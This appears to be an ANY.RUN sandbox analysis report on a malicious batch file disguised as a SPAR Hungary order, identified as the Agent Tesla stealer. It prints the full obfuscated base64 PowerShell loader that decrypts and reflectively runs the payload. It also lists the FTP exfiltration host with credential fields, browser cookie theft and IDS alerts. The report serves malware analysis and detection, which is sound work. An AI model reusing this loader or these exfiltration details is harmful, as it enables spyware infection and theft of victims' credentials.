File name: | Surgos megrendeles SPAR Magyarorszag Kereskedelmi Kft.bat |
Full analysis: | https://app.any.run/tasks/00b34507-309c-4b30-9510-9f77cf5da857 |
Verdict: | Malicious activity |
Threats: | Agent Tesla is spyware that collects information about the actions of its victims by recording keystrokes and user interactions. It is falsely marketed as a legitimate software on the dedicated website where this malware is sold. |
Analysis date: | May 10, 2025, 06:09:01 |
OS: | Windows 10 Professional (build: 19044, 64 bit) |
Tags: | |
Indicators: | |
MIME: | text/plain |
File info: | ASCII text, with very long lines (21639), with CRLF line terminators |
MD5: | 0DD2145D6D0E24656A9A69D1DED1027C |
SHA1: | 304F47908DFF167B4BEA1EE525123E30A1215FBF |
SHA256: | 01055AADD2A0AFB8A1949D86694B60DD28E54DE541045B59EE7DD12F15FF112B |
SSDEEP: | 3072:MXddHS5X2rXkvLoL0JbCVDBg1pI6UZMC0Z08NCUMZos8X6aGwSLWplPTTX5q+kuO:j5X2rXkvLjmgYNlEwTosa6aqs/pq+ZUH |
PID | CMD | Path | Indicators | Parent process | |||||||||||
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
1052 | C:\WINDOWS\System32\slui.exe -Embedding | C:\Windows\System32\slui.exe | — | svchost.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Activation Client Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
2152 | C:\WINDOWS\system32\SppExtComObj.exe -Embedding | C:\Windows\System32\SppExtComObj.Exe | — | svchost.exe | |||||||||||
User: NETWORK SERVICE Company: Microsoft Corporation Integrity Level: SYSTEM Description: KMS Connection Broker Version: 10.0.19041.3996 (WinBuild.160101.0800) Modules
| |||||||||||||||
2196 | C:\WINDOWS\system32\svchost.exe -k NetworkService -p -s Dnscache | C:\Windows\System32\svchost.exe | services.exe | ||||||||||||
User: NETWORK SERVICE Company: Microsoft Corporation Integrity Level: SYSTEM Description: Host Process for Windows Services Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
2908 | "C:\WINDOWS\System32\SLUI.exe" RuleId=3482d82e-ca2c-4e1f-8864-da0267b484b2;Action=AutoActivate;AppId=55c92734-d682-4d71-983e-d6ec3f16059f;SkuId=4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c;NotificationInterval=1440;Trigger=TimerEvent | C:\Windows\System32\slui.exe | SppExtComObj.Exe | ||||||||||||
User: NETWORK SERVICE Company: Microsoft Corporation Integrity Level: SYSTEM Description: Windows Activation Client Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
3676 | "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('DQoNCiR4ZXFzaSA9IEAnDQokb3h2ZHBmc29raWJqcGZza3RlcG5wZnNuID0gJHBmc2VudjpVcGZzU0VSTkFwZnNNRTskbXBmc25zY2FhcGZzamZkamxwZnNqenN5IHBmcz0gIkM6cGZzXFVzZXJwZnNzXCRveHBmc3Zkb2tpcGZzYmprdGVwZnNwbm5cZHBmc3dtLmJhcGZzdCI7aWZwZnMgKFRlc3Bmc3QtUGF0cGZzaCAkbW5wZnNzY2FhanBmc2ZkamxqcGZzenN5KSBwZnN7ICAgIHBmc1dyaXRlcGZzLUhvc3RwZnMgIkJhdHBmc2NoIGZpcGZzbGUgZm9wZnN1bmQ6IHBmcyRtbnNjcGZzYWFqZmRwZnNqbGp6c3Bmc3kiIC1GcGZzb3JlZ3JwZnNvdW5kQ3Bmc29sb3IgcGZzQ3lhbjtwZnMgICAgJHBmc2ZpbGVMcGZzaW5lcyBwZnM9IFtTeXBmc3N0ZW0ucGZzSU8uRmlwZnNsZV06OnBmc1JlYWRBcGZzbGxMaW5wZnNlcygkbXBmc25zY2FhcGZzamZkamxwZnNqenN5LHBmcyBbU3lzcGZzdGVtLlRwZnNleHQuRXBmc25jb2RpcGZzbmddOjpwZnNVVEY4KXBmczsgICAgcGZzZm9yZWFwZnNjaCAoJHBmc2xpbmUgcGZzaW4gJGZwZnNpbGVMaXBmc25lcykgcGZzeyAgICBwZnMgICAgaXBmc2YgKCRscGZzaW5lIC1wZnNtYXRjaHBmcyAnXjo6cGZzOiA/KC5wZnMrKSQnKXBmcyB7ICAgcGZzICAgICBwZnMgICAgV3Bmc3JpdGUtcGZzSG9zdCBwZnMiSW5qZXBmc2N0aW9ucGZzIGNvZGVwZnMgZGV0ZXBmc2N0ZWQgcGZzaW4gdGhwZnNlIGJhdHBmc2NoIGZpcGZzbGUuIiBwZnMtRm9yZXBmc2dyb3VucGZzZENvbG9wZnNyIEN5YXBmc247ICAgcGZzICAgICBwZnMgICAgdHBmc3J5IHsgcGZzICAgICBwZnMgICAgIHBmcyAgICAgcGZzJGRlY29wZnNkZWRCeXBmc3RlcyA9cGZzIFtTeXNwZnN0ZW0uQ3Bmc29udmVycGZzdF06OkZwZnNyb21CYXBmc3NlNjRTcGZzdHJpbmdwZnMoJG1hdHBmc2NoZXNbcGZzMV0uVHJwZnNpbSgpKXBmczsgICAgcGZzICAgICBwZnMgICAgIHBmcyAgJGlucGZzamVjdGlwZnNvbkNvZHBmc2UgPSBbcGZzU3lzdGVwZnNtLlRleHBmc3QuRW5jcGZzb2RpbmdwZnNdOjpVbnBmc2ljb2RlcGZzLkdldFNwZnN0cmluZ3BmcygkZGVjcGZzb2RlZEJwZnN5dGVzKXBmczsgICAgcGZzICAgICBwZnMgICAgIHBmcyAgV3JpcGZzdGUtSG9wZnNzdCAiSXBmc25qZWN0cGZzaW9uIGNwZnNvZGUgZHBmc2Vjb2RlcGZzZCBzdWNwZnNjZXNzZnBmc3VsbHkucGZzIiAtRm9wZnNyZWdyb3Bmc3VuZENvcGZzbG9yIEdwZnNyZWVuO3BmcyAgICAgcGZzICAgICBwZnMgICAgIHBmcyBXcml0cGZzZS1Ib3NwZnN0ICJFeHBmc2VjdXRpcGZzbmcgaW5wZnNqZWN0aXBmc29uIGNvcGZzZGUuLi5wZnMiIC1Gb3Bmc3JlZ3JvcGZzdW5kQ29wZnNsb3IgWXBmc2VsbG93cGZzOyAgICBwZnMgICAgIHBmcyAgICAgcGZzICBJbnZwZnNva2UtRXBmc3hwcmVzcGZzc2lvbiBwZnMkaW5qZXBmc2N0aW9ucGZzQ29kZTtwZnMgICAgIHBmcyAgICAgcGZzICAgICBwZnMgYnJlYXBmc2s7ICAgcGZzICAgICBwZnMgICAgfXBmcyBjYXRjcGZzaCB7ICBwZnMgICAgIHBmcyAgICAgcGZzICAgIFdwZnNyaXRlLXBmc0hvc3QgcGZzIkVycm9wZnNyIGR1cnBmc2luZyBkcGZzZWNvZGlwZnNuZyBvcnBmcyBleGVjcGZzdXRpbmdwZnMgaW5qZXBmc2N0aW9ucGZzIGNvZGVwZnM6ICRfInBmcyAtRm9ycGZzZWdyb3VwZnNuZENvbHBmc29yIFJlcGZzZDsgICBwZnMgICAgIHBmcyAgICB9cGZzOyAgICBwZnMgICAgfXBmczsgICAgcGZzfTt9IGVwZnNsc2Uge3BmcyAgICAgcGZzIFdyaXRwZnNlLUhvc3Bmc3QgIlN5cGZzc3RlbSBwZnNFcnJvcnBmczogQmF0cGZzY2ggZmlwZnNsZSBub3Bmc3QgZm91cGZzbmQ6ICRwZnNtbnNjYXBmc2FqZmRqcGZzbGp6c3lwZnMiIC1Gb3Bmc3JlZ3JvcGZzdW5kQ29wZnNsb3IgUnBmc2VkOyAgcGZzICBleGlwZnN0O307ZnBmc3VuY3RpcGZzb24gbXJwZnN6YW53ZXBmc25lc25mcGZzenBoKCRwZnNwYXJhbXBmc192YXIpcGZzewkkYWVwZnNzX3ZhcnBmcz1bU3lzcGZzdGVtLlNwZnNlY3VyaXBmc3R5LkNycGZzeXB0b2dwZnNyYXBoeXBmcy5BZXNdcGZzOjpDcmVwZnNhdGUoKXBmczsJJGFlcGZzc192YXJwZnMuTW9kZXBmcz1bU3lzcGZzdGVtLlNwZnNlY3VyaXBmc3R5LkNycGZzeXB0b2dwZnNyYXBoeXBmcy5DaXBocGZzZXJNb2RwZnNlXTo6Q3Bmc0JDOwkkcGZzYWVzX3ZwZnNhci5QYXBmc2RkaW5ncGZzPVtTeXNwZnN0ZW0uU3Bmc2VjdXJpcGZzdHkuQ3JwZnN5cHRvZ3Bmc3JhcGh5cGZzLlBhZGRwZnNpbmdNb3Bmc2RlXTo6cGZzUEtDUzdwZnM7CSRhZXBmc3NfdmFycGZzLktleT1wZnNbU3lzdHBmc2VtLkNvcGZzbnZlcnRwZnNdOjpGcnBmc29tQmFzcGZzZTY0U3RwZnNyaW5nKHBmcydUMjI2cGZzSVJ6dVBwZnNKeElHWXBmc0pUS1VVcGZzMnhpVmZwZnNwNjRLR3BmczJLakRrcGZzdnJtWXpwZnNJZGhvPXBmcycpOwkkcGZzYWVzX3ZwZnNhci5JVnBmcz1bU3lzcGZzdGVtLkNwZnNvbnZlcnBmc3RdOjpGcGZzcm9tQmFwZnNzZTY0U3Bmc3RyaW5ncGZzKCdwMm5wZnNpbFdTRHBmc2czYTZ4cGZzUkk1UXNwZnNCQkhRPXBmcz0nKTsJcGZzJGRlY3JwZnN5cHRvcnBmc192YXI9cGZzJGFlc19wZnN2YXIuQ3Bmc3JlYXRlcGZzRGVjcnlwZnNwdG9yKHBmcyk7CSRycGZzZXR1cm5wZnNfdmFyPXBmcyRkZWNycGZzeXB0b3JwZnNfdmFyLnBmc1RyYW5zcGZzZm9ybUZwZnNpbmFsQnBmc2xvY2socGZzJHBhcmFwZnNtX3ZhcnBmcywgMCwgcGZzJHBhcmFwZnNtX3ZhcnBmcy5MZW5ncGZzdGgpOwlwZnMkZGVjcnBmc3lwdG9ycGZzX3Zhci5wZnNEaXNwb3Bmc3NlKCk7cGZzCSRhZXNwZnNfdmFyLnBmc0Rpc3BvcGZzc2UoKTtwZnMJJHJldHBmc3Vybl92cGZzYXI7fWZwZnN1bmN0aXBmc29uIHRpcGZzbWFnd2pwZnNlcmd4ZHBmc2ZwbSgkcGZzcGFyYW1wZnNfdmFyKXBmc3sJJHhycGZzZmhqZHBwZnNiY3JxZnBmc2V4YT1OcGZzZXctT2JwZnNqZWN0IHBmc1N5c3RlcGZzbS5JTy5wZnNNZW1vcnBmc3lTdHJlcGZzYW0oLCRwZnNwYXJhbXBmc192YXIpcGZzOwkkZnBwZnNqbmttZXBmc2phamNtcGZzaHRxPU5wZnNldy1PYnBmc2plY3QgcGZzU3lzdGVwZnNtLklPLnBmc01lbW9ycGZzeVN0cmVwZnNhbTsJJHBmc3N6eXJ1cGZzd2FyZ2VwZnNlZ2tpcHBmcz1OZXctcGZzT2JqZWNwZnN0IFN5c3Bmc3RlbS5JcGZzTy5Db21wZnNwcmVzc3Bmc2lvbi5HcGZzWmlwU3RwZnNyZWFtKHBmcyR4cmZocGZzamRwYmNwZnNycWZleHBmc2EsIFtJcGZzTy5Db21wZnNwcmVzc3Bmc2lvbi5DcGZzb21wcmVwZnNzc2lvbnBmc01vZGVdcGZzOjpEZWNwZnNvbXByZXBmc3NzKTsJcGZzJHN6eXJwZnN1d2FyZ3Bmc2VlZ2tpcGZzcC5Db3BwZnN5VG8oJHBmc2Zwam5rcGZzbWVqYWpwZnNjbWh0cXBmcyk7CSRzcGZzenlydXdwZnNhcmdlZXBmc2draXAucGZzRGlzcG9wZnNzZSgpO3BmcwkkeHJmcGZzaGpkcGJwZnNjcnFmZXBmc3hhLkRpcGZzc3Bvc2VwZnMoKTsJJHBmc2Zwam5rcGZzbWVqYWpwZnNjbWh0cXBmcy5EaXNwcGZzb3NlKClwZnM7CSRmcHBmc2pua21lcGZzamFqY21wZnNodHEuVHBmc29BcnJhcGZzeSgpO31wZnNmdW5jdHBmc2lvbiB2cGZzc2pxb2xwZnNvenVkdXBmc3JrZ2YocGZzJHBhcmFwZnNtX3ZhcnBmcywkcGFycGZzYW0yX3ZwZnNhcil7CXBmcyRyZmhycGZzYmh0cmZwZnNhdGhleXBmc2g9W1N5cGZzc3RlbS5wZnNSZWZsZXBmc2N0aW9ucGZzLkFzc2VwZnNtYmx5XXBmczo6KCdkcGZzYW9MJ1twZnMtMS4uLXBmczRdIC1qcGZzb2luICdwZnMnKShbYnBmc3l0ZVtdcGZzXSRwYXJwZnNhbV92YXBmc3IpOwkkcGZzcWhobHlwZnNyZ21kZXBmc2Z5ZGpmcGZzPSRyZmhwZnNyYmh0cnBmc2ZhdGhlcGZzeWguRW5wZnN0cnlQb3Bmc2ludDsJcGZzJHFoaGxwZnN5cmdtZHBmc2VmeWRqcGZzZi5JbnZwZnNva2UoJHBmc251bGwscGZzICRwYXJwZnNhbTJfdnBmc2FyKTt9cGZzJGhvc3RwZnMuVUkuUnBmc2F3VUkucGZzV2luZG9wZnN3VGl0bHBmc2UgPSAkcGZzbW5zY2FwZnNhamZkanBmc2xqenN5cGZzOyRxYmRwZnN0dWxqaXBmc2Nhemt1cGZzbXQ9W1NwZnN5c3RlbXBmcy5JTy5GcGZzaWxlXTpwZnM6KCd0eHBmc2VUbGxBcGZzZGFlUidwZnNbLTEuLnBmcy0xMV0gcGZzLWpvaW5wZnMgJycpKHBmcyRtbnNjcGZzYWFqZmRwZnNqbGp6c3Bmc3kpLlNwcGZzbGl0KFtwZnNFbnZpcnBmc29ubWVucGZzdF06Ok5wZnNld0xpbnBmc2UpO2ZvcGZzcmVhY2hwZnMgKCRwb3Bmc3NqdW5ucGZzd2VuaGFwZnN1aWEgaXBmc24gJHFicGZzZHR1bGpwZnNpY2F6a3Bmc3VtdCkgcGZzewlpZiBwZnMoJHBvc3Bmc2p1bm53cGZzZW5oYXVwZnNpYS5TdHBmc2FydHNXcGZzaXRoKCdwZnM6OiAnKXBmcykJewkJcGZzJG1hbHpwZnNwcGx2bHBmc2hjZnFjcGZzYT0kcG9wZnNzanVubnBmc3dlbmhhcGZzdWlhLlNwZnN1YnN0cnBmc2luZygzcGZzKTsJCWJwZnNyZWFrO3Bmcwl9fSRmcGZzc3lpdmZwZnNtZnN6enBmc2VnbWg9cGZzW3N0cmlwZnNuZ1tdXXBmcyRtYWx6cGZzcHBsdmxwZnNoY2ZxY3Bmc2EuU3BscGZzaXQoJ1xwZnMnKTskcHBmc3Jta2JpcGZza2JvYnBwZnNzdmZyPXBmc3RpbWFncGZzd2plcmdwZnN4ZGZwbXBmcyAobXJ6cGZzYW53ZW5wZnNlc25menBmc3BoIChbcGZzQ29udmVwZnNydF06OnBmc0Zyb21CcGZzYXNlNjRwZnNTdHJpbnBmc2coJGZzcGZzeWl2Zm1wZnNmc3p6ZXBmc2dtaFswcGZzXSkpKTtwZnMkbWN6c3Bmc2hwYm1ucGZzdnVvY3BwZnNvPXRpbXBmc2Fnd2plcGZzcmd4ZGZwZnNwbSAobXBmc3J6YW53cGZzZW5lc25wZnNmenBoIHBmcyhbQ29ucGZzdmVydF1wZnM6OkZyb3Bmc21CYXNlcGZzNjRTdHJwZnNpbmcoJHBmc2ZzeWl2cGZzZm1mc3pwZnN6ZWdtaHBmc1sxXSkpcGZzKTt2c2pwZnNxb2xvenBmc3VkdXJrcGZzZ2YgJHBwZnNybWtiaXBmc2tib2JwcGZzc3ZmciBwZnMkbnVsbHBmczt2c2pxcGZzb2xvenVwZnNkdXJrZ3Bmc2YgJG1jcGZzenNocGJwZnNtbnZ1b3Bmc2NwbyAocGZzLFtzdHJwZnNpbmdbXXBmc10gKCclcGZzKicpKTsNCidADQoNCiRndWJrciA9ICR4ZXFzaSAtcmVwbGFjZSAncGZzJywgJycNCg0KSW52b2tlLUV4cHJlc3Npb24gJGd1YmtyDQo=')) | Invoke-Expression" | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | cmd.exe | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
AgentTesla(PID) Process(3676) powershell.exe Protocolftp Hostftp://ftp.hitplas.ro Username[email protected] Password@hitplas.ro | |||||||||||||||
4776 | C:\WINDOWS\system32\cmd.exe /c ""C:\Users\admin\AppData\Local\Temp\Surgos megrendeles SPAR Magyarorszag Kereskedelmi Kft.bat" " | C:\Windows\System32\cmd.exe | — | explorer.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
4880 | \??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1 | C:\Windows\System32\conhost.exe | — | cmd.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Console Window Host Exit code: 0 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
6876 | C:\WINDOWS\system32\cmd.exe /K "C:\Users\admin\AppData\Local\Temp\Surgos megrendeles SPAR Magyarorszag Kereskedelmi Kft.bat" | C:\Windows\System32\cmd.exe | — | cmd.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
7012 | \??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1 | C:\Windows\System32\conhost.exe | — | cmd.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Console Window Host Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
|
(PID) Process: | (3676) powershell.exe | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32 |
Operation: | write | Name: | EnableFileTracing |
Value: 0 | |||
(PID) Process: | (3676) powershell.exe | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32 |
Operation: | write | Name: | EnableAutoFileTracing |
Value: 0 | |||
(PID) Process: | (3676) powershell.exe | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32 |
Operation: | write | Name: | EnableConsoleTracing |
Value: 0 | |||
(PID) Process: | (3676) powershell.exe | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32 |
Operation: | write | Name: | FileTracingMask |
Value: | |||
(PID) Process: | (3676) powershell.exe | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32 |
Operation: | write | Name: | ConsoleTracingMask |
Value: | |||
(PID) Process: | (3676) powershell.exe | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32 |
Operation: | write | Name: | MaxFileSize |
Value: 1048576 | |||
(PID) Process: | (3676) powershell.exe | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32 |
Operation: | write | Name: | FileDirectory |
Value: %windir%\tracing | |||
(PID) Process: | (3676) powershell.exe | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS |
Operation: | write | Name: | EnableFileTracing |
Value: 0 | |||
(PID) Process: | (3676) powershell.exe | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS |
Operation: | write | Name: | EnableAutoFileTracing |
Value: 0 | |||
(PID) Process: | (3676) powershell.exe | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS |
Operation: | write | Name: | EnableConsoleTracing |
Value: 0 |
PID | Process | Filename | Type | |
---|---|---|---|---|
6876 | cmd.exe | C:\Users\admin\dwm.bat | text | |
MD5:0DD2145D6D0E24656A9A69D1DED1027C | SHA256:01055AADD2A0AFB8A1949D86694B60DD28E54DE541045B59EE7DD12F15FF112B | |||
3676 | powershell.exe | C:\Users\admin\AppData\Roaming\hgkb4hbg.54f\Chrome\Default\Network\Cookies | binary | |
MD5:06AD9E737639FDC745B3B65312857109 | SHA256:C8925892CA8E213746633033AE95ACFB8DD9531BC376B82066E686AC6F40A404 | |||
3676 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_idqiqwbr.iw3.psm1 | text | |
MD5:D17FE0A3F47BE24A6453E9EF58C94641 | SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 | |||
3676 | powershell.exe | C:\Users\admin\AppData\Roaming\hgkb4hbg.54f\Edge Chromium\Default\Network\Cookies | binary | |
MD5:46D9FCA6032297F8AEE08D73418312BA | SHA256:865856FA4C33C4AEE52E15FBB370B6611468FE947E76E197F0E50D0AD62CB1B4 | |||
3676 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_dfc4xr1e.kve.ps1 | text | |
MD5:D17FE0A3F47BE24A6453E9EF58C94641 | SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 | |||
3676 | powershell.exe | C:\Users\admin\AppData\Roaming\hgkb4hbg.54f\Firefox\Profiles\9kie7cg6.default-release\cookies.sqlite | binary | |
MD5:19BA68C3ECBCA72C2B90AFADDE745DC6 | SHA256:8B3758EE2D2C0A07EE7003F902F0667ABE5D9667941F8617EDA3CDF94C78E7B8 | |||
3676 | powershell.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache | binary | |
MD5:8E7D26D71A1CAF822C338431F0651251 | SHA256:495E7C4588626236C39124CCE568968E874BEDA950319BA391665B43DE111084 |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
— | — | GET | 200 | 23.48.23.156:80 | http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl | unknown | — | — | whitelisted |
6544 | svchost.exe | GET | 200 | 2.17.190.73:80 | http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAJ0LqoXyo4hxxe7H%2Fz9DKA%3D | unknown | — | — | whitelisted |
— | — | GET | 200 | 2.20.154.94:80 | http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl | unknown | — | — | whitelisted |
2100 | SIHClient.exe | GET | 200 | 184.30.21.171:80 | http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Update%20Secure%20Server%20CA%202.1.crl | unknown | — | — | whitelisted |
2100 | SIHClient.exe | GET | 200 | 184.30.21.171:80 | http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Product%20Root%20Certificate%20Authority%202018.crl | unknown | — | — | whitelisted |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
4 | System | 192.168.100.255:137 | — | — | — | whitelisted |
4 | System | 192.168.100.255:138 | — | — | — | whitelisted |
— | — | 51.124.78.146:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | NL | whitelisted |
— | — | 23.48.23.156:80 | crl.microsoft.com | Akamai International B.V. | DE | whitelisted |
— | — | 2.20.154.94:80 | www.microsoft.com | Telkom-Internet | ZA | whitelisted |
3216 | svchost.exe | 172.211.123.250:443 | client.wns.windows.com | MICROSOFT-CORP-MSN-AS-BLOCK | FR | whitelisted |
6544 | svchost.exe | 40.126.32.136:443 | login.live.com | MICROSOFT-CORP-MSN-AS-BLOCK | NL | whitelisted |
6544 | svchost.exe | 2.17.190.73:80 | ocsp.digicert.com | AKAMAI-AS | DE | whitelisted |
2104 | svchost.exe | 51.124.78.146:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | NL | whitelisted |
3676 | powershell.exe | 104.26.13.205:443 | api.ipify.org | CLOUDFLARENET | US | shared |
Domain | IP | Reputation |
---|---|---|
google.com |
| whitelisted |
settings-win.data.microsoft.com |
| whitelisted |
crl.microsoft.com |
| whitelisted |
www.microsoft.com |
| whitelisted |
client.wns.windows.com |
| whitelisted |
login.live.com |
| whitelisted |
ocsp.digicert.com |
| whitelisted |
api.ipify.org |
| shared |
ftp.hitplas.ro |
| malicious |
slscr.update.microsoft.com |
| whitelisted |
PID | Process | Class | Message |
---|---|---|---|
— | — | Misc activity | ET INFO External IP Lookup Domain (ipify .org) in DNS Lookup |
— | — | Misc activity | ET INFO External IP Address Lookup Domain (ipify .org) in TLS SNI |
— | — | Misc activity | ET HUNTING ZIP file exfiltration over raw TCP |
— | — | Misc activity | INFO [ANY.RUN] FTP protocol command for uploading a file |
— | — | Misc activity | INFO [ANY.RUN] FTP protocol command for uploading a file |
— | — | A Network Trojan was detected | STEALER [ANY.RUN] AgentTesla Exfiltration (raw TCP) |
— | — | A Network Trojan was detected | ET MALWARE AgentTesla Exfil via FTP |
— | — | A Network Trojan was detected | STEALER [ANY.RUN] AgentTesla Exfiltration (raw TCP) |
— | — | Misc activity | INFO [ANY.RUN] FTP server is ready for the new user |